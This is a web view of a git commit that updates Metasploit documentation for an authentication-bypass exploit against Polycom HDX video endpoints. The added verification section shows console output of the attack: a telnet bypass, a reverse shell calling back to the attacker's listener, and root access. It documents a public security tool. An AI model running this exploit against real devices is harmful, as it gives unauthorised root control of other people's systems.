Browse Source

update documentation with verification

Brent Cook 3 years ago
parent
commit
50c918f889
1 changed files with 34 additions and 5 deletions
  1. 34
    5
      documentation/modules/exploit/unix/misc/psh_auth_bypass.md

+ 34
- 5
documentation/modules/exploit/unix/misc/psh_auth_bypass.md View File

@@ -1,7 +1,36 @@
1 1
 ## Vulnerable Application
2 2
 
3
-  This module exploits the Polycom HDX Video End Points with software <= 3.0.5.
4
-  
5
-  However, due to the price and availability of this device, this module has not been verified by the [msf community](https://github.com/rapid7/metasploit-framework/pull/6960) or [exploit-db](https://www.exploit-db.com/exploits/24494/).
6
-  
7
-  If you are able to test this module, please post results to the [PR](https://github.com/rapid7/metasploit-framework/pull/6960)
3
+This module exploits the Polycom HDX Video End Points with software <= 3.0.5.
4
+It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port
5
+23 should be accessible, as it is with the factory default configuration.
6
+
7
+## Verification Steps
8
+
9
+A successful check of the exploit will look like this:
10
+
11
+```
12
+msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
13
+msf exploit(psh_auth_bypass) > run
14
+
15
+[*] Started reverse double SSL handler on 192.168.1.120:4444
16
+[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
17
+[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
18
+[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
19
+[*] Accepted the first client connection...
20
+[*] Accepted the second client connection...
21
+[*] Command: echo xInxktvgUmm7hPyh;
22
+[*] Writing to socket A
23
+[*] Writing to socket B
24
+[*] Reading from sockets...
25
+[*] Reading from socket B
26
+[*] B: "xInxktvgUmm7hPyh\n"
27
+[*] Matching...
28
+[*] A is input...
29
+[*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
30
+[*] 192.168.1.155:23 - Shutting down payload stager listener...
31
+
32
+whoami
33
+root
34
+uname -a
35
+Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
36
+```

Loading…
Cancel
Save